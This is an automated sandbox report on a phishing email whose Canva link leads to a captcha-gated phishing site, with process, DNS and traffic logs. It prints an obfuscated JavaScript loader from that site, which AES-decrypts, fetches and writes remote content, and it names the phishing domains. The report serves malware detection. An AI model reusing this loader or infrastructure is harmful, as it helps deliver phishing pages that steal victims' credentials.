Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FW_ SLS properties Credit application.msg

Overview

General Information

Sample name:FW_ SLS properties Credit application.msg
Analysis ID:1498073
MD5:6550979bbc9d04348f3d32e0764ad95a
SHA1:caa91816d5da43dee533d98775e9ff7cfc272819
SHA256:899bf7076e1030ae35dbf1e13157d62b707593734fd146b6379cb5ce17fbe6be
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML page contains hidden javascript code
Javascript checks online IP of machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6780 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\FW_ SLS properties Credit application.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6960 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "596D25AB-B66E-4175-A155-48EB7DB6500E" "6D46B4B3-AA18-4D8C-B7BC-95B0F75ACEFD" "6780" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e= MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 4188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 3772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 1132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e= MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 1508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1908,i,17427697382459923548,16447669437909309874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://logicvortexe.pl/YBBW6/Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xkbon/0x4AAAAAAAhTwdWbdnGPyTzD/auto/fbE/normal/auto/Matcher: Template: captcha matched
Source: https://logicvortexe.pl/YBBW6/HTTP Parser: async function earthward(ululate) { <!-- <p>a car is freedom on four wheels.</p> --> var {a,b,c,d} = json.parse(ululate); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- a cars engine hums with the promise of possibilities. --> } (async () => { document.write(await earthward(await (await fetch(await earthward(atob(`eyjhijoishfmvksznvq2uudpuhhlxc9dvhltavjjz3rxalwvskv4mwjpbm1jvwgyzky4psisimmioijlnzuzogrizdi1owi2mdm0otayzdvkyzdkywnjzwe2osisimiioiiwnzi0zgzjmwviotixn2m0ywy0mzi0n2nkmwjlmmi3zjk1ntq4yjfkzjaxmzcxzdmznjiyytrjn2rhn2q1zjm4y2fiyza4mzvkzja0zta0zgzjzte1mjrjmze5yte0zgrjngvkmjjioddlmzfjmtfmmdrln2vmmtiwowzlyzrmndcxzdeymgm3zdk0njixmwm4zwjlnzu0ngvmytc2nzeyytdjodfmmjlhzmq5ytlingu3zdk0yznkndewztc5ndcyzdc4yzm4ztdmowi2zdgzndllotdmnjfjztc0mjhjngjiyzq5yzg2yzhjmwvjm2q3yze2otm1ytq3odnmmje4njnkzjg2odq4...
Source: https://www.canva.com/design/DAGOmfvTQik/JOV039GfGLa9-L3q9YZIrQ/view?utm_content=DAGOmfvTQik&utm_campaign=designshare&utm_medium=link&utm_source=editorHTTP Parser: Base64 decoded: 1724421684.000000
Source: https://cdn.metadata.io/site-insights.jsHTTP Parser: (function () { /** * @type {string} key for the visitor id cookie. */ const visitoridkey = "metadata_visitor_id"; /** * @type {string} key for the session id cookie. */ const sessionidkey = "metadata_session_id"; /** * @type {string} ip address of the client. */ let ip; /** * account configuration object. */ const config = { invalid: true }; /** * options object. */ const opts = { /** * @type {string} base url for the cdn. */ cdnbaseurl: "https://cdn.metadata.io/pixel/config", /** * @type {string} base url for the api. */ baseurl: "https://api-gw.metadata.io", /** * @type {string} account id. */ accountid: null }; /** * get the value of a cookie. * @param {string} key - the key of the cookie. * @returns {string|null} the value of the cookie, or null if not found. */ const getcookievalue = (key) => { const cookie = document.cookie.split("; ").find(function (cookie) { ...
Source: https://logicvortexe.pl/YBBW6/HTTP Parser: No favicon
Source: https://logicvortexe.pl/YBBW6/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.162:443 -> 192.168.2.17:49768 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: global trafficDNS traffic detected: DNS query: urldefense.proofpoint.com
Source: global trafficDNS traffic detected: DNS query: www.canva.com
Source: global trafficDNS traffic detected: DNS query: static.canva.com
Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global trafficDNS traffic detected: DNS query: o13855.ingest.sentry.io
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: chunk-composing.canva.com
Source: global trafficDNS traffic detected: DNS query: font-public.canva.com
Source: global trafficDNS traffic detected: DNS query: media.canva.com
Source: global trafficDNS traffic detected: DNS query: telemetry.canva.com
Source: global trafficDNS traffic detected: DNS query: cdn.metadata.io
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ct.canva.com
Source: global trafficDNS traffic detected: DNS query: sp.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: p.tvpixel.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: logicvortexe.pl
Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: adservice.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: logicwavewe.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
